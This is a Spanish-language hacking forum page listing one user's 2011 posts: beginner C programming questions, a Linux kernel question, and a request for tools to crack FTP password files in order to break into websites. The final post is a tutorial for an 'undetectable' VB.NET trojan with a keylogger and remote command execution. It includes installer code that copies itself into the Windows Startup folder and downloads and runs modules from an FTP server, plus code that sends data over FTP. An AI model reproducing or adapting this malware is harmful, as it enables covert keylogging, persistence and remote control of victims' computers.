elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


  Mostrar Temas
Páginas: 1 [2]
11  Programación / Programación C/C++ / Ayuda con Conexión en C en: 25 Septiembre 2011, 15:39 pm
Bueno, no se si es mucho pedir pero; necesito en ejemplo de subir mandar/archivos por FTP en C (un cliente simple); o almenos un codigo para un cliente SSH.
He buscado mucho en google, pero lo unico que encuentro es Filezilla y no es precisamente simple, y cuando encuentro algo es para C# o C++.
¿Alguno de ustedes tiene un ejemplo de código, por muy simple que sea?
12  Seguridad Informática / Análisis y Diseño de Malware / Virus Multiplataforma en: 22 Septiembre 2011, 16:01 pm
No se si esta serará la mejor parte del foro para ponerlo, pero supongo que un virus multiplataforma es algo avanzado, asi que hay va mi pregunta (en realidad dos);
-¿Que es un virus multiplataforma, en que consiste?
-¿Un virus multiplataforma utiliza el mismo ejecuable para infectar dos S.O.?
13  Programación / Programación C/C++ / Problema con C en: 20 Septiembre 2011, 21:58 pm
Buenas, estoy haciendo un programa en C (estoy aprendiendo, nada complicado); pero me sale un error; lo he revisado y no le encuentro ningun error. Espero que puedan ayudarme; les dejo el código que tengo echo:
Código
  1. //Enjemplo con FOR en C
  2. #include <stdio.h>
  3. int main()
  4. {
  5.   int a, b, i;
  6.   printf("Bienvenido a nuestro programa que utiliza el FOR.\nEste programa le pedirá dos números, y le calculará todos los cuadrados de los números que esten entre esos dos números.\nEscriba el primer número:\t");
  7.   scanf("%d\n", a);
  8.   printf("Escriba el segundo número:\t");
  9.   scanf("%d\n", b);
  10.   printf("\t Número \t\t\t Cuadrado\n\n");
  11.   for( i=a; i<=b; ++i)
  12.      printf("\t %d \t\t\t %d \n\n",i,i*i);
  13.  
  14.   printf("\t---FIN DEL PROGRAMA---");
  15. }
  16.  
14  Seguridad Informática / Nivel Web / Spamdexing en: 17 Septiembre 2011, 14:07 pm
No se si esta parte del foro para poner esto pero... he estado buscando en google sobre spamdexing y no encuentro ningun manual; alguin me puede pasar un link?¿ gracias
15  Programación / Programación C/C++ / Ejecutar en C-Ayuda en: 12 Septiembre 2011, 16:42 pm
Buenas; he buscado en google pero no encuantro nada sobre con que código se ejecuta en una terminal desde C; y que esa terminal sea su salida estandas, es decir; yo hago doble click en un archivo ejecutable y este me abre una terminal y las funciones printf, scanf etc, se realizan através de la terminal que ha abierto este ejecutable... ¿?alguien me puede poner un ejemplo de código?¿

EI: juntando mensajes.

Nada, encontre parte;
system("gedit")
Pero como hago para que ahora la entrada/salida se haga en esa terminal?¿
16  Programación / Programación C/C++ / Ayuda en C en: 9 Septiembre 2011, 17:02 pm
Estoy empezando en C y necesito ayuda. Estoy haciendo un programa que me pida una operación y segun la operación que escoja, haga esa operación con dos numeros que me pide. Este es el código:
Código:
//Este es mi tercer programa echo en C
main()
{
int o, a, b, r;
printf ("¿Que operación desea realizar?: (x = multiplicar; / = dividir; + = sumar; - = restar)\n");
scanf("%d",&o);
if (o= "x")
printf ("Ha elegido multiplicar. Escriba el primer número:\n");
scanf("%d",&a);
printf ("Escriba el segundo número:\n");
scanf("%d",&b);
r=a*b;
printf ("El resultado de la operación es:%d\n",r);
}
El problema es que luego, cuando lo ejecuto me sale lo siguiente:
¿Que operación desea realizar?: (x = multiplicar; / = dividir; + = sumar; - = restar)
x
Ha elegido multiplicar. Escriba el primer número:
Escriba el segundo número:
El resultado de la operación es:-2064563936
-----Como ven me pregunta que que operación deseo realizar, y yo le contesto x, pero apartir de aí, todo me sale automático, y no me pregunta numeros>>y encima sale ese numero como reultado.
Utilizo GCC en Ubuntu.
17  Sistemas Operativos / GNU/Linux / Duda sobre código fuente de Linux en: 8 Septiembre 2011, 12:07 pm
Buenas, hace tiempo que estoy en windows, y ahora me estoy empezando a trabajar con linux, concretamende con ubuntu, que me va muy ien y a mi gusto es muy bueno---- y mi pregunta es:
--Me he descargado el codigo fuente del kernel, y me encontrado con algo de headers,,, bueno llevo trabajando ya uno o dos meses y necesito ayuda con esto, alguien me dice que son??
--Y otra cosa, compilando ese codigo fuente ( descargado con apt-ge install linux-source, podria tener problemas al conetarme con wifi¿? (si no le hago ningun cambio).

18  Seguridad Informática / Hacking / Problema, ayuda en: 29 Agosto 2011, 18:53 pm
Buenas, hace un tiempo que me dedico a esto de hackear, pero siempre contraseñas de msn, y esas cosas, y ahora me estoy interesando por los servidores ftp (para hackear webs). Busqué por internet y encontré un manual que me gustó bastante:
http://www.pablin.com.ar/computer/info/varios/hackftp1.htm

Lo que pasa es que está bastante anticuado (habla de Windows 95) y al final cuando pone el programa para desemcriptar el archivo passwd pues ya está caido.
¿Alguien sabe donde me lo podría descargar?. He probado con JhonRipper pero por más que busco no me entero de como funciona. Se agradece toda ayuda.

19  Programación / .NET (C#, VB.NET, ASP) / Troyano en VB.NET (indectectable) en: 23 Agosto 2011, 20:42 pm
Hola, soy nuevo en el foro y quería empezar a publicar y a contribuir asi que voy a poner un tema sobre como hacer un troyano con algunas funciones sin rastro de winsock (el winsock todos los antivirus lo dectectan ya).
Pués bien, compienzo: :D

Antes de empezar voy a dejar claro las funciones que quiero que tenga:
-Keylogger
-Chat
-Chat "a lo Matrix"  ;D
-Abrir consola
-Ejecutar

abrimos el Visual Basic (en mi caso el 2008, que también funciona en windows 7) y agregamos un nuevo proyecto. Este será el "Panel de control" del cliente:
Ponemos unos buttons (yo los he puesto incluidos en un ToolStrip, pero da igual).
Aquí viene una de las cosas que debes de tener en cuenta para que tu troyano FTP no se te bloquee; esos botones, no habren un Form2, ni otro formulario, si no que habrén programas que se encargan de esa función (la del keylogger por ejemplo).
Esto lo hacemos por que si pones todas las conexiones del troyano (keylogger, ordenes, chats...) pues el programa se te acaba saturando y bloqueando; por ello, lo ponemos por separado. Aunque lo metamos por separado, no hace falta que el ejecute todos los apartados>>>>en vez de eso, ejecutará un solo programa, el cual se descargará las otras partes de un servidor y las pondrá en las carpetas del equipo correspondientes. El código sería así:

Código:
Public Class Form1
    Dim aPath As String = Application.ExecutablePath()

    Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
        If Not My.Computer.FileSystem.FileExists("C:\Documents and Settings\Administrador\Menú Inicio\Programas\Inicio\msp.exe") Then
            My.Computer.FileSystem.CopyFile(aPath, "C:\Documents and Settings\Administrador\Menú Inicio\Programas\Inicio\msp.exe")
        End If
        If My.Computer.FileSystem.FileExists("C:\WINDOWS\keg.exe") And My.Computer.FileSystem.FileExists("C:\WINDOWS\ord.exe") Then
            Shell("C:\WINDOWS\keg.exe")
            Shell("C:\WINDOWS\ord.exe")
        End If
        If Not My.Computer.FileSystem.FileExists("C:\WINDOWS\keg.exe") Then
            My.Computer.Network.DownloadFile("ftp://servidor/key.exe", "C:\WINDOWS\keg.exe", "user", "passw")
        End If
        If Not My.Computer.FileSystem.FileExists("C:\WINDOWS\cht.exe") Then
            My.Computer.Network.DownloadFile("ftp://servidor/chat.exe", "C:\WINDOWS\cht.exe", "user", "passw")
        End If
        If Not My.Computer.FileSystem.FileExists("C:\WINDOWS\chmat.exe") Then
            My.Computer.Network.DownloadFile("ftp://servidor/chatmatrix.exe", "C:\WINDOWS\chmat.exe", "user", "passw")
        End If
        If Not My.Computer.FileSystem.FileExists("C:\WINDOWS\ord.exe") Then
            My.Computer.Network.DownloadFile("ftp://servidor/ordenes.exe", "C:\WINDOWS\ord.exe", "user", "passw")
            Shell("C:\WINDOWS\keg.exe")
            Shell("C:\WINDOWS\ord.exe")
        End If
        End
    End Sub
End Class


Ese sería el código del "Instalador" del Server.
Tampoco pretendo poner todo el código fuente de mi troyano así que diré lo imprescindible:

--La transmisión de datos de los chat se hace por el siguiente código:
Código:
Dim name As String
        name = TextBox1.Text
        Try
            Dim client As New Net.WebClient
            client.Credentials = New Net.NetworkCredential("user", "passw")
            client.UploadString("fttp://sevidor/cht1.txt", name & ": " & vbNewLine & RichTextBox1.Text & vbNewLine)
            RichTextBox1.Clear()
        Catch ex As Exception
        End Try
        Try
            Dim client As New Net.WebClient
            client.Credentials = New Net.NetworkCredential("user", "passw")
            RichTextBox2.Text = client.DownloadString("ftp://servidor/cht1.txt")
        Catch ex As Exception
        End Try

Doy por echo que sabeis hacer un keylogger así que no lo pongo.

Y como no queremos que se acumulen las ordenes cuando las mandemos, al recibirlas el servidor sube un archivo que sustituye el otro, dejandolo en blanco, lo cual se haría con este código: (este código se pondría después de que se ejecutase el correspodiente archivo)

Servidor (el apartado de las ordenes):
Código:
My.Computer.FileSystem.WriteAllText(aPath & "\remord1.txt", _
        "", True)
                My.Computer.Network.UploadFile(aPath & "\remord1.txt", "ftp://servidor/orderlist1.txt", "user", "passw")
                My.Computer.FileSystem.DeleteFile(aPath & "\remord1.txt")
                RichTextBox1.Clear()

Os pongo una foto de como queda:
-La pantalla del Servidor cuando le pones el chat "a lo Matrix" (toda la pantalla):


-Y como sería el controlador del chat "a lo matrix" (el cliente):



Bueno espero que os sirva para adaptaros a las nuevas politicas anti-winsock que se manifistan en windows 7  ;D
Páginas: 1 [2]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines